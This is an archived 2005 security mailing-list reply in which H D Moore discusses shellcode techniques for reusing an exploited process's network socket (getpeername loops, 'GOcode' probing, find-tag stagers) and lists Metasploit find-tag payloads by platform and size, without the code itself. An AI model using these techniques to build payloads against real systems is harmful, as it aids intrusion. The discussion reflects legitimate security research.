Dailydave mailing list archives
Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Thu, 6 Jan 2005 23:21:39 -0600
On Thursday 06 January 2005 20:57, Dave Aitel wrote:
> 1. LSD-style getpeername loop. [...] in fact, this is the method everyone else but Immunity and .gov.cn and a few other random people use (Halvar, for example :>), as far as I know.
Somewhat of a broad statement, NAT has made these obsolete for a while...
> 2. If you were at G-Con 1 several years back you [...] . The one relating to stealing sockets is his initial implementation of "GOcode". Basically it goes to each socket, sends a G down it, and waits for a sec. Then it reads one byte. If it gets an O (hence, the GOcode) then it knows it has the right socket. CANVAS uses GOcode for SPARC Solaris, Linux, and Windows. Bas Alberts spent a long time making it actually work. It sounds easy, but especially on Win32 there are a lot of "gotchas". This is usually pretty big code and maybe some people are wondering why their connection happened to get a G sent to it - but it has one major advantage: It doesn't care about NAT devices. (Various people use PEEK as a refinement on this technique).
Please see the code below. Win32 find tag shellcode, ~92 bytes and works on every version of Windows from NT 4.0 to 2003. Commented source and the associated paper should be available sometime soon.
> 3. If you search Google for "readclient shellcode" you can see that several Chinese exploits have been successful at using the readclient/writeclient ISAPI functions for back communications.
This is some really interesting stuff, unfortunately all of the comments are in Chinese (and afaik nobody has translated them). It is funny how much stuff comes out of xfocus that is years ahead of the rest of the world. Maybe some day you will open-source your ECB payloads? :-)

And now on to the warez (all written by metasploit staff, part of 2.3)...

# win32 find tag -> recv -> jump code (92 bytes)
# linux ia32 find tag -> recv -> jump code (37 bytes)
# bsd ia32 find tag -> recv -> jump code (40 bytes)
# macos x ppc find tag -> recv -> jump code (76 bytes)

Cheers,
-HD